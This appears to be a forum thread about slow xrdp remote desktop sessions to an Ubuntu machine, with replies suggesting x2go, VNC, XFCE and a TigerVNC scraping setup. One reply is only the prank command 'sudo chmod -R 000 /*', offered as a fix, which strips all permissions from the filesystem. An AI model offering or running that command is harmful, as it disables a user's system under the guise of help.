Remote Desktop for Linux

Hey Guys,

Currently I have a shitty Internet Connection at home, so often I work on a Win22 Server machine in a data Center connected via RDP. At home I have an Ultrawide Display (5120x1440) as my main Screen. With Windows everything works fine. When I resize a Window, everything is more or less smooth.

For some work, I also need Linux Desktop. So I decided to install Linux Desktop and a Machine in the Data Center and add xrdp as RDP Server. The machine runs the latest Ubuntu version. But I nearly can't use it via RDP. It takes seconds to draw a new window. The System is nearly unusable. Do you know a solution for this?

And I looked into the config of xrdp, caching and compression and all the other things to reduce the traffic is on.

There are many ways to do remote desktop in linux but my personal favorite is x2go; it's secure and only requires an open ssh port.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

For now I use xrdp, remote side is i5-4xxx, with KDE, but there are fast internet connections on both sides, performance is acceptable for things i use to do.

I think, that using XFCE, less resolutions, less color depth can help. Or you can give a try VNC, X2Go or NX.

One weird idea, but it costs nothing — if these are not same Machines, you can connect from home to Windows Machine and from Windows Machine to Linux Desktop via xrdp...

ad infinitum

• 1 month later...

In my experience using RDP on Linux is kind of dodgy. I came to terms that a VNC Scraping server is the way to go. No need to configure sessions and all that nonsense. It behaves like RDP. At one point, I needed to do some dev work and knowing my OS would get messy real quick. I spun up a Mint VM and VNC into that for dev stuff. Functioned pretty smooth.

https://www.howtoforge.com/tutorial/how-to-start-a-vnc-server-for-the-actual-display-scraping-with-tigervnc/

With a little Linux magic, you can configure the scraping server to act as a service. Connect via Remmina or whatever you want to and you're done. Works like a charm.